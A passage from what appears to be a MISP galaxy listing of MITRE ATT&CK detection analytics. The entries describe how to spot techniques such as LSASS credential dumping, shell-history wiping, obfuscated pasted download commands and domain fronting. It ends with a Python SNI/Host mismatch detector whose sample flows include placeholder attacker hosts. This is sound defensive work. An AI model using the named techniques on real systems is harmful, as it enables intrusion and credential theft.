external_id AN0664
mitre_platforms ['macOS']

Analytic 0646 - AN0646

Detects anomalous usage of ESXi Guest Operations APIs such as StartProgramInGuest, ListProcessesInGuest, ListFileInGuest, or InitiateFileTransferFromGuest. Defender perspective focuses on unusual frequency of guest API calls, invocation from unexpected management accounts, or execution outside of business hours. These correlated signals indicate adversarial abuse of ESXi administrative services to run commands on guest VMs.

Internal MISP references

UUID f25cf3cf-53b8-4fa4-be4c-d0a7a02bf739 which can be used as unique global reference for Analytic 0646 - AN0646 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0646
mitre_platforms ['ESXi']

Analytic 0467 - AN0467

Detects adversary behavior clearing command history via history -c, deletion or modification of ~/.bash_history, or manipulation of the HISTFILE environment variable post-login.

Internal MISP references

UUID 0ebcdeba-7b02-4f1c-96c9-a602b3663446 which can be used as unique global reference for Analytic 0467 - AN0467 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0467
mitre_platforms ['Linux']

Analytic 0647 - AN0647

Defenders may observe adversary attempts to collect or export full device configurations by detecting unusual SNMP queries, Smart Install (SMI) activity, or CLI/API commands that request running or startup configuration dumps. Correlated behaviors include high-volume read requests for sensitive OIDs, repeated use of 'show running-config' or equivalent commands from untrusted IPs, or unexpected TFTP/SCP/FTP transfers containing configuration files. These behaviors often appear in sequence: anomalous authentication or privilege escalation, followed by bulk configuration retrieval and outbound transfer.

Internal MISP references

UUID 58e73108-657e-42ce-8dad-4edc968a2b20 which can be used as unique global reference for Analytic 0647 - AN0647 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0647
mitre_platforms ['Network Devices']

Analytic 0746 - AN0746

Abuse of cloud messaging platforms to send mass spam or consume quota-based resources.

Internal MISP references

UUID 6e5bfc6b-3f07-426b-ac9f-6a8cc6b591c3 which can be used as unique global reference for Analytic 0746 - AN0746 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0746
mitre_platforms ['SaaS']

Analytic 0764 - AN0764

Correlation of registry key modification for Run/RunOnce with abnormal parent-child process relationships and outlier execution at user logon or system startup.

Internal MISP references

UUID aa12f037-f724-43a6-97ca-e2e706859c1a which can be used as unique global reference for Analytic 0764 - AN0764 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0764
mitre_platforms ['Windows']

Analytic 0674 - AN0674

Monitor for abnormal certificate enrollment events in identity platforms, unexpected use of token-signing certificates, and unusual CA configuration modifications.

Internal MISP references

UUID af8d3a12-dafb-4e40-8017-7d20d9e77d55 which can be used as unique global reference for Analytic 0674 - AN0674 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0674
mitre_platforms ['Identity Provider']

Analytic 0476 - AN0476

EFI updates executed via system processes or binaries outside of expected patch windows or using unsigned firmware packages.

Internal MISP references

UUID df32865a-79b2-4faa-abd4-3ecfa27c8a77 which can be used as unique global reference for Analytic 0476 - AN0476 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0476
mitre_platforms ['macOS']

Analytic 0486 - AN0486

Forged cookies on macOS may show up as abnormal access to Safari/Chrome cookie databases in ~/Library/Cookies, combined with unexpected logon sessions authenticated by those cookies. Unified Logs may show cookie injection events or abnormal access patterns to Keychain when linked to browser authentication flows.

Internal MISP references

UUID 27a0146c-0af8-4323-9c41-fbd3df9af1fa which can be used as unique global reference for Analytic 0486 - AN0486 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0486
mitre_platforms ['macOS']

Analytic 0648 - AN0648

Processes accessing LSASS memory or SAM registry hives outside of trusted security tools, often followed by file creation or lateral movement. Detects unauthorized access to sensitive OS subsystems for credential extraction.

Internal MISP references

UUID 5a5d5ff5-e2bb-4ba9-9f95-504c86b1a1cf which can be used as unique global reference for Analytic 0648 - AN0648 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0648
mitre_platforms ['Windows']

Analytic 0846 - AN0846

Adversary enumeration of local user accounts using Net.exe, WMI, or PowerShell.

Internal MISP references

UUID 6ffbdad6-3d60-452b-9e04-a8292d0125e9 which can be used as unique global reference for Analytic 0846 - AN0846 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0846
mitre_platforms ['Windows']

Analytic 0864 - AN0864

A tampered app/pkg/notarized update is installed via installer, softwareupdated, Homebrew, or vendor updater; new Mach-O or bundle contents appear in /Applications, /Library, /usr/local or /opt/homebrew; first run spawns sh/zsh/osascript/curl and makes egress to unfamiliar domains; AMFI/Gatekeeper may log signature/notarization problems.

Internal MISP references

UUID 86a87684-5fd5-4778-be36-5dfa07a4246d which can be used as unique global reference for Analytic 0864 - AN0864 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0864
mitre_platforms ['macOS']

Analytic 0468 - AN0468

Detects adversary clearing shell history using history -c or deleting/altering ~/.zsh_history or ~/.bash_history. Focus on sessions with missing or wiped history.

Internal MISP references

UUID 9199891a-1543-4f51-be59-4fffb03dfd43 which can be used as unique global reference for Analytic 0468 - AN0468 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0468
mitre_platforms ['macOS']

Analytic 0684 - AN0684

Audit VoIP/SIP logs for suspicious outbound calls or call setup messages to unusual endpoints. Correlate with user activity such as browser execution or package installation following the call.

Internal MISP references

UUID c5134555-561a-4905-8601-a6ba307fc121 which can be used as unique global reference for Analytic 0684 - AN0684 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0684
mitre_platforms ['Linux']

Analytic 0469 - AN0469

Detects PowerShell Clear-History invocation or deletion of ConsoleHost_history.txt to erase past PowerShell session history.

Internal MISP references

UUID 01b79770-a269-4b4d-bf09-a4760bae9c94 which can be used as unique global reference for Analytic 0469 - AN0469 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0469
mitre_platforms ['Windows']

Analytic 0496 - AN0496

Detects exploitation of vulnerabilities in cloud identity providers (IdPs) such as Azure AD or Okta for credential access. Defender perspective includes anomalous token creation or renewal, authentication bypass events, and API abuse to mint unauthorized tokens. Correlation highlights exploitation attempts tied to absent or inconsistent audit logs.

Internal MISP references

UUID 0b8b8557-0393-4c63-963f-e5a3b5cc6ad8 which can be used as unique global reference for Analytic 0496 - AN0496 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0496
mitre_platforms ['Identity Provider']

Analytic 0694 - AN0694

Defenders observe command-line executions or API-based registry reads targeting sensitive paths like HKLM or HKCU with keyword filters such as 'password', 'cred', or 'logon'. Typically performed by Reg.exe, PowerShell, custom binaries, or offensive tools such as Cobalt Strike. Correlation with process ancestry and command-line arguments indicates suspicious credential discovery activity.

Internal MISP references

UUID 4c744ac0-ba25-4b42-8397-9b398ba55eb8 which can be used as unique global reference for Analytic 0694 - AN0694 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0694
mitre_platforms ['Windows']

Analytic 0649 - AN0649

Processes opening /proc//mem or /proc//maps targeting credential-storing services like sshd or login. Behavior often includes high privilege escalation and memory inspection tools such as gcore or gdb.

Internal MISP references

UUID 82cdec5a-52af-4489-b002-b0256e5ba60e which can be used as unique global reference for Analytic 0649 - AN0649 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0649
mitre_platforms ['Linux']

Analytic 0964 - AN0964

User pastes an obfuscated command into Terminal.app/iTerm2 that decodes or downloads code and executes. Detects Terminal/iTerm2 spawning bash/zsh/python with suspicious pipeline/base64 patterns followed by file writes in ~/Library or /tmp and outbound network connections.

Internal MISP references

UUID acf0fdbb-6fbf-42c0-acc4-75a545c24f90 which can be used as unique global reference for Analytic 0964 - AN0964 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0964
mitre_platforms ['macOS']

Analytic 0946 - AN0946

Implantation of malicious code into container images followed by registry push and use in new deployments.

Internal MISP references

UUID de0a1136-1476-4c28-bf49-004ac3ef97f7 which can be used as unique global reference for Analytic 0946 - AN0946 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0946
mitre_platforms ['Containers']

Analytic 0477 - AN0477

Firmware image uploaded via TFTP/SCP or web interface followed by reboot or unexpected loss of connectivity.

Internal MISP references

UUID 39d675d5-548d-4b35-8a8f-a6605ae3835d which can be used as unique global reference for Analytic 0477 - AN0477 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0477
mitre_platforms ['Network Devices']

Analytic 0747 - AN0747

Detects adversarial archiving using libraries (zlib, zip APIs) invoked by scripts or binaries. Correlates process executions of Python, PowerShell, or custom .NET binaries with DLL/module loads linked to compression libraries, followed by archive file creation.

Internal MISP references

UUID 4bdc0555-f7f0-4b5b-80c9-77f361881a01 which can be used as unique global reference for Analytic 0747 - AN0747 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0747
mitre_platforms ['Windows']

Analytic 0774 - AN0774

Unusual modification of boot records (MBR, VBR) or EFI partitions not associated with legitimate patch cycles or OS upgrades. Registry or WMI events associated with firmware update tools executed from unexpected parent processes. API calls (e.g., DeviceIoControl) writing directly to raw disk sectors. Subsequent abnormal boot configuration changes followed by unsigned driver loads.

Internal MISP references

UUID e2ca60b5-82df-4e7e-8528-dd24d9a79750 which can be used as unique global reference for Analytic 0774 - AN0774 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0774
mitre_platforms ['Windows']

Analytic 0478 - AN0478

Script or binary performs a rapid sequence of system discovery checks (e.g., CPU count, RAM size, registry keys, running processes) indicative of VM detection.

Internal MISP references

UUID 04bcbbb7-bfa9-41a5-9fb8-72a6df9ad50b which can be used as unique global reference for Analytic 0478 - AN0478 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0478
mitre_platforms ['Windows']

Analytic 0874 - AN0874

Detection of HTML-based downloads via Safari/Chrome that create obfuscated files (e.g., .zip, .app, .js) in user directories and are followed by suspicious executions from preview or launch services.

Internal MISP references

UUID 5f8b5ef5-8b4a-4713-a694-dc0746669a73 which can be used as unique global reference for Analytic 0874 - AN0874 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0874
mitre_platforms ['macOS']

Analytic 0784 - AN0784

Identifies archive utilities (e.g., ditto, unzip, xar, pkgutil) used to extract payloads to non-standard paths, then correlates with execution or file permission changes (e.g., chmod +x) and process spawns from decompressed location.

Internal MISP references

UUID 62afd8a1-550d-43a6-a56a-7d5ae5abbcf6 which can be used as unique global reference for Analytic 0784 - AN0784 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0784
mitre_platforms ['macOS']

Analytic 0847 - AN0847

Enumeration of local users or groups via file access (/etc/passwd) or commands like id, groups.

Internal MISP references

UUID 7b87b63c-0936-48b5-8017-47bf5561e6f9 which can be used as unique global reference for Analytic 0847 - AN0847 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0847
mitre_platforms ['Linux']

Analytic 0748 - AN0748

Detects adversarial archiving by scripts or binaries calling compression libraries (libzip, zlib, bzip2). Correlates execution of Python, Perl, or compiled binaries with dynamic linking to archiving libraries and creation of compressed files in /tmp or user directories.

Internal MISP references

UUID 90e51090-9857-4a28-98b9-f21401ddbe85 which can be used as unique global reference for Analytic 0748 - AN0748 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0748
mitre_platforms ['Linux']

Analytic 0487 - AN0487

Forged cookies in SaaS environments manifest as valid web sessions without matching login activity, MFA enforcement bypass, or cookies reused across multiple devices/IPs. Defenders should look for cookie replay, concurrent sessions from multiple geographies, or session tokens generated by unrecognized apps.

Internal MISP references

UUID f8c255ac-8ba5-4971-9e11-420a10e688ad which can be used as unique global reference for Analytic 0487 - AN0487 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0487
mitre_platforms ['SaaS']

Analytic 0794 - AN0794

Monitor Mail.app activity or unified logs for anomalous SMTP usage, including mismatches between display name and authenticated AppleID or Exchange credentials. Detect use of third-party mail utilities that attempt to send on behalf of corporate identities.

Internal MISP references

UUID 1305f37f-8333-4d86-9714-340b66c65771 which can be used as unique global reference for Analytic 0794 - AN0794 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0794
mitre_platforms ['macOS']

Analytic 0749 - AN0749

Detects malicious archiving via system or third-party libraries (libz, libarchive) invoked by Python, Swift, or Objective-C binaries. Correlates unified logs of library loads with creation of compressed or encrypted archives (.zip, .gz, .bz2, .dmg).

Internal MISP references

UUID 4ecd8727-bcf3-4fce-8c04-e8d0bad1267e which can be used as unique global reference for Analytic 0749 - AN0749 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0749
mitre_platforms ['macOS']

Analytic 0947 - AN0947

Creation or modification of cloud virtual machine images (AMIs, custom images) with persistence mechanisms, followed by infrastructure provisioning that uses these implanted images.

Internal MISP references

UUID 7845facb-50f2-4d32-ae00-6766b9410681 which can be used as unique global reference for Analytic 0947 - AN0947 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0947
mitre_platforms ['IaaS']

Analytic 0479 - AN0479

Shell script or binary uses multiple system commands (e.g., dmidecode, lscpu, lspci) in quick succession to detect a virtualization environment.

Internal MISP references

UUID 7b4b3b54-d992-4f03-922a-6eec96c9342e which can be used as unique global reference for Analytic 0479 - AN0479 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0479
mitre_platforms ['Linux']

Analytic 0974 - AN0974

Detects usage of shared memory directories (/dev/shm, /run/shm) for temporary storage of obfuscated, encoded, or executable data without persistence to disk.

Internal MISP references

UUID b521510b-83bc-46a2-8fc8-65a6975bcfca which can be used as unique global reference for Analytic 0974 - AN0974 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0974
mitre_platforms ['Linux']

Analytic 0497 - AN0497

Detection of anomalous ROMMON image changes or upgrades, unexpected reboots following firmware updates, and unauthorized use of firmware upgrade commands or TFTP transfers. Correlation of config modification, privilege escalation, and boot cycle anomalies provides visibility into ROMMON tampering attempts.

Internal MISP references

UUID ca649f9b-2a1f-4d45-b61b-33ac38d6a4ee which can be used as unique global reference for Analytic 0497 - AN0497 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0497
mitre_platforms ['Network Devices']

Analytic 0884 - AN0884

Abnormal invocation of diskutil or asr with destructive flags (eraseDisk, zeroDisk), or low-level IOKit calls that overwrite raw disk content. Detect correlation between elevated process execution and disk erase operations.

Internal MISP references

UUID 1065ad69-8969-4ae0-9df6-dc7e7b1129c2 which can be used as unique global reference for Analytic 0884 - AN0884 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0884
mitre_platforms ['macOS']

Analytic 0848 - AN0848

Enumeration of macOS local users using dscl, id, dscacheutil, or /etc/passwd access.

Internal MISP references

UUID be680af0-8d5f-482c-9042-f5d4921e65f8 which can be used as unique global reference for Analytic 0848 - AN0848 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0848
mitre_platforms ['macOS']

Analytic 0488 - AN0488

A trusted/signed developer utility (parent) is executed in a non-developer context and (a) spawns suspicious children (e.g., powershell.exe, cmd.exe, rundll32.exe, regsvr32.exe, wscript.exe), (b) loads unsigned/user-writable DLLs, (c) writes and then runs a new PE from user-writable paths, and/or (d) immediately makes outbound network connections.

Internal MISP references

UUID d69c9d97-17d6-4dad-a4d4-ec41e7fb34fb which can be used as unique global reference for Analytic 0488 - AN0488 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0488
mitre_platforms ['Windows']

Analytic 0498 - AN0498

Correlated evidence of anomalous browser/network behavior (suspicious external resource fetches and script injection patterns) followed by atypical child processes, ephemeral execution contexts, memory modification or process injection, and unexpected file drops. Defender sees network requests to previously unseen/suspicious domains or resources + browser process spawning unusual children or loading unsigned modules + file writes or registry changes shortly after those requests.

Internal MISP references

UUID 35701083-a327-4f68-a426-13751b9743c3 which can be used as unique global reference for Analytic 0498 - AN0498 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0498
mitre_platforms ['Windows']

Analytic 0489 - AN0489

High-frequency, repetitive service requests (e.g., HTTP, TLS renegotiation) originating from a single or small set of source IPs targeting endpoint web services or application ports, leading to exhaustion of CPU or memory on targeted Windows services.

Internal MISP references

UUID 8c03988c-3387-48e4-8013-7b9d223b8911 which can be used as unique global reference for Analytic 0489 - AN0489 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0489
mitre_platforms ['Windows']

Analytic 0894 - AN0894

Disabling of security macros or safe mode settings within Word/Excel/Outlook. Detect registry edits or configuration file changes that weaken macro enforcement.

Internal MISP references

UUID a807fb55-1c4f-4353-90d6-1a05aa05f2c9 which can be used as unique global reference for Analytic 0894 - AN0894 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0894
mitre_platforms ['Office Suite']

Analytic 0948 - AN0948

Detects anomalous use of macOS XPC services for code execution. Monitors for processes invoking privileged XPC daemons with abnormal parameters, unexpected binaries communicating over NSXPCConnection, or helper tools executing code outside of their expected parent process lineage. Correlates process access attempts to system-level daemons, privilege escalations via XPC misconfigurations, and injection of malicious payloads through inter-process communication.

Internal MISP references

UUID a8284241-0d8e-42da-b86d-48f0d660df6c which can be used as unique global reference for Analytic 0948 - AN0948 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0948
mitre_platforms ['macOS']

Analytic 0984 - AN0984

Detects renamed binaries or scripts placed into trusted paths like /usr/bin or /lib with mismatched metadata or unexpected creation/modification times.

Internal MISP references

UUID adf3e421-95ec-4b5a-9c00-0262cb888c0a which can be used as unique global reference for Analytic 0984 - AN0984 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0984
mitre_platforms ['Linux']

Analytic 0849 - AN0849

Enumeration of local ESXi accounts using esxcli or vSphere API from unauthorized sessions.

Internal MISP references

UUID d2bca034-2f97-4c64-ac30-e75d24886be7 which can be used as unique global reference for Analytic 0849 - AN0849 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0849
mitre_platforms ['ESXi']

Analytic 0499 - AN0499

Correlated evidence of browser or webview fetches to uncommon domains or mutated JS resources (proxy/NGFW logs + Zeek/HTTP logs) followed by unexpected interpreters or script engines executing (python, ruby, sh) spawned from browser processes or user sessions, rapid on-disk staging in /tmp, and outbound connections that deviate from baseline. Defender sees: uncommon resource fetch → short-lived child process executions from user browser context → file writes in temp directories → anomalous outbound C2-like connections.

Internal MISP references

UUID 32b5b330-2a40-4117-8999-395c23490614 which can be used as unique global reference for Analytic 0499 - AN0499 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0499
mitre_platforms ['Linux']

Analytic 0994 - AN0994

Monitor unified logs for processes spawned from Safari or other browsers that immediately load scripts or executables. Detect file drops in ~/Library/Caches or ~/Downloads that execute shortly after being written.

Internal MISP references

UUID ba6a9282-30e0-491c-90a7-35bf4ad25ba3 which can be used as unique global reference for Analytic 0994 - AN0994 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0994
mitre_platforms ['macOS']

Analytic 0949 - AN0949

Monitors for unexpected modifications of system or application binaries, particularly signed executables. Correlates file write events with subsequent unsigned or anomalously signed process execution, and checks for tampered binaries outside normal patch cycles.

Internal MISP references

UUID e2ebd04e-074d-4b90-b94c-a43048b1c3ac which can be used as unique global reference for Analytic 0949 - AN0949 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0949
mitre_platforms ['Windows']

Analytic 0555 - AN0555

Identify unauthorized creation, deletion, or modification of business-critical stored data such as Office documents, database files, and log archives. Detect anomalous processes modifying stored data outside of expected workflows (e.g., non-database processes modifying database files).

Internal MISP references

UUID e08eb9fa-4a45-434b-9776-277bd545f1f7 which can be used as unique global reference for Analytic 0555 - AN0555 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0555
mitre_platforms ['Windows']

Analytic 0556 - AN0556

Detect suspicious file creation, modification, or deletion in stored data directories (e.g., /var/lib/mysql/, /var/log/, mail spools). Identify shell commands interacting directly with structured data files instead of legitimate database utilities.

Internal MISP references

UUID 425a3e89-ac22-4ff3-bc1e-ca1672113075 which can be used as unique global reference for Analytic 0556 - AN0556 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0556
mitre_platforms ['Linux']

Analytic 0655 - AN0655

Detection of spearphishing attachments by correlating suspicious email delivery with subsequent file creation and abnormal process execution (e.g., Office spawning PowerShell or CMD). Behavior chain includes inbound email metadata → attachment stored on disk → process execution → outbound network activity.

Internal MISP references

UUID db6995d9-68ab-4638-a430-c0a8d2daf306 which can be used as unique global reference for Analytic 0655 - AN0655 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0655
mitre_platforms ['Windows']

Analytic 0565 - AN0565

Applications such as curl, wget, or custom binaries initiate HTTPS connections where the TLS SNI is mismatched or absent while HTTP Host targets CDN-available C2 endpoints.

Internal MISP references

UUID e031d1a5-92a9-46df-9467-d6899d48f57b which can be used as unique global reference for Analytic 0565 - AN0565 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0565
mitre_platforms ['Linux']

Analytic 0557 - AN0557

Monitor sensitive data files such as plist-based storage, mail archives, or Office files for unexpected modifications. Detect anomalous processes modifying stored data outside expected update cycles using FSEvents and Unified Logs.

Internal MISP references

UUID 23b6aee9-90fc-46b8-bf8b-36043218f393 which can be used as unique global reference for Analytic 0557 - AN0557 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0557
mitre_platforms ['macOS']

Analytic 0575 - AN0575

Detects VM enumeration attempts using virtualization utilities such as VirtualBox (VBoxManage) or Parallels CLI. Defender observes abnormal invocation of VM listing commands correlated with non-admin users or unusual parent processes.

Internal MISP references

UUID 86bb41b4-5c8a-4407-b788-8f6ea8457860 which can be used as unique global reference for Analytic 0575 - AN0575 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0575
mitre_platforms ['macOS']

Analytic 0755 - AN0755

Adversary modifies Group Policy Objects (GPOs), domain trust, or directory service objects via GUI, CLI, or programmatic APIs. Behavior includes creation/modification of GPOs, delegation permissions, trust objects, or rogue domain controller registration.

Internal MISP references

UUID f403ae40-31ff-4550-b21f-e1c24315276d which can be used as unique global reference for Analytic 0755 - AN0755 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0755
mitre_platforms ['Windows']

Analytic 0855 - AN0855

Defender observes configuration changes on firewall/network appliance involving rule creation, modification, or deletion from abnormal management IPs or non-console channels (e.g., remote CLI, API). These are often correlated with a spike in previously blocked outbound traffic, unexpected allow-all rules, or bulk rule deletions. Behavior often follows unauthorized login, privilege escalation, or API abuse.

Internal MISP references

UUID 17ce541a-23fa-4b33-affc-c6ba906e9956 which can be used as unique global reference for Analytic 0855 - AN0855 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0855
mitre_platforms ['Network Devices']

Analytic 0558 - AN0558

Execution of control.exe or rundll32.exe with parameters pointing to CPL files, especially from non-standard directories or newly created files, followed by suspicious child process execution or registry modifications registering new Control Panel items.

Internal MISP references

UUID 8581bca4-9d34-4c78-87f7-29244581d140 which can be used as unique global reference for Analytic 0558 - AN0558 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0558
mitre_platforms ['Windows']

Analytic 0585 - AN0585

Malicious script or binary causes repeated kernel panics, OOM kills, or systemd service restarts targeting services like nginx, httpd, sshd.

Internal MISP references

UUID b7e4a6de-8ff3-4711-aa83-97533adec211 which can be used as unique global reference for Analytic 0585 - AN0585 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0585
mitre_platforms ['Linux']

Analytic 0595 - AN0595

Adversary modifies or replaces the Terminal Services DLL (termsrv.dll) or changes the associated ServiceDll Registry value to load an arbitrary or patched DLL that enables persistent and enhanced RDP access. This may include binary replacement, registry tampering, and unexpected module loads by the svchost.exe -k termsvcs process.

Internal MISP references

UUID 01f18cc1-2948-4ea7-adaf-017da939b9ff which can be used as unique global reference for Analytic 0595 - AN0595 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0595
mitre_platforms ['Windows']

Analytic 0559 - AN0559

Execution of built-in tools (e.g., ipconfig, route, netsh) or PowerShell/WMI queries to enumerate IP, MAC, interface status, or routing configuration.

Internal MISP references

UUID edfec58e-e591-4057-a906-1baf3674d80b which can be used as unique global reference for Analytic 0559 - AN0559 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0559
mitre_platforms ['Windows']

Analytic 0955 - AN0955

Access tokens or SSH keys used without corresponding login shell or PAM module activity, particularly for remote execution.

Internal MISP references

UUID fbe17895-73cc-432e-8576-f6cab851feb1 which can be used as unique global reference for Analytic 0955 - AN0955 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0955
mitre_platforms ['Linux']

Analytic 0656 - AN0656

Phishing attachments executed on Linux systems are detected by linking email logs to file creation in mail directories and subsequent suspicious process execution. Look for unexpected binaries or scripts spawned from user mail directories and anomalous outbound network activity.

Internal MISP references

UUID 02309791-384c-4ca9-b25c-6a6bc754795f which can be used as unique global reference for Analytic 0656 - AN0656 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0656
mitre_platforms ['Linux']

Analytic 0665 - AN0665

Adversary defaces internal VM-hosted portals or web UIs by modifying static content on datastore-mounted paths.

Internal MISP references

UUID 0e7e1861-14be-4862-8cba-6344e6e196f2 which can be used as unique global reference for Analytic 0665 - AN0665 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0665
mitre_platforms ['ESXi']

Analytic 0566 - AN0566

Unsigned or user-space apps initiate TLS connections whose SNI names one hostname while the HTTP Host header sent inside the tunnel requests a different domain, the SNI/Host mismatch abused by CDN-resident domain fronting.

Internal MISP references

UUID b4cf91ba-a22b-49b4-978e-32c3e1301c74 which can be used as unique global reference for Analytic 0566 - AN0566 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0566
mitre_platforms ['macOS']

Analytic 0765 - AN0765

Correlates creation/modification of systemd service files or /etc/init.d scripts with outlier process behavior during boot.

Internal MISP references

UUID 156387d6-9b9a-49f8-834a-cf3cd5ede09c which can be used as unique global reference for Analytic 0765 - AN0765 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0765
mitre_platforms ['Linux']

Analytic 0567 - AN0567

Traffic originating from ESXi hosts or management interfaces displays SNI-to-Host mismatch behavior, particularly anomalous given typical infrastructure communication patterns.

Internal MISP references

UUID 4192b311-da7a-4ef1-b09a-a03a8c2a1670 which can be used as unique global reference for Analytic 0567 - AN0567 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0567
mitre_platforms ['ESXi']
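
The SNI/Host comparison behind AN0566 and AN0567, written out as an added example; this is not part of the MITRE analytic, and the flow records (process, signed, sni, host) are constructed to look like what a TLS-inspecting proxy or EDR would emit.

```python
"""Added example for AN0566/AN0567: flag TLS flows whose SNI and HTTP Host header
disagree (domain-fronting shape). Not MITRE code; the record layout is an
assumption about what a TLS-inspecting proxy or EDR emits."""
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample flows (not real telemetry). "signed" = code-signed client process.
SAMPLE_FLOWS = [
    {"process": "Safari", "signed": True,
     "sni": "www.example.com", "host": "www.example.com"},
    {"process": "updater", "signed": False,
     "sni": "cdn.example.net", "host": "c2.attacker-front.net"},
    {"process": "hostd", "signed": True,
     "sni": "vcenter.corp.local", "host": "vcenter.corp.local"},
    {"process": "python3", "signed": False,
     "sni": "images.example-cdn.com", "host": "beacon.example-cdn.com"},
    {"process": "curl", "signed": False,
     "sni": "api.example.org", "host": "API.EXAMPLE.ORG:443"},
]


def normalize_host(name: str) -> str:
    """Lower-case, strip trailing dot and any :port so 'A.B:443' == 'a.b'."""
    return name.lower().rstrip(".").split(":")[0]


def registrable_domain(name: str) -> str:
    """Crude eTLD+1 (last two labels). Production code should use the Public
    Suffix List so that e.g. 'x.co.uk' is not reduced to 'co.uk'."""
    labels = normalize_host(name).split(".")
    return ".".join(labels[-2:])


@dataclass
class Finding:
    process: str
    sni: str
    host: str
    severity: str


def classify(flow: dict) -> Optional[Finding]:
    sni, host = normalize_host(flow["sni"]), normalize_host(flow["host"])
    if sni == host:
        return None                       # normal: SNI and Host agree
    if registrable_domain(sni) != registrable_domain(host):
        severity = "high"                 # fronting shape: different owner domain
    elif not flow["signed"]:
        severity = "medium"               # same CDN tenant but unsigned client
    else:
        severity = "low"                  # e.g. www vs api on the same domain
    return Finding(flow["process"], sni, host, severity)


def find_fronting(flows: List[dict]) -> List[Finding]:
    """Return one Finding per SNI/Host mismatch, in input order."""
    return [f for f in (classify(fl) for fl in flows) if f is not None]
```

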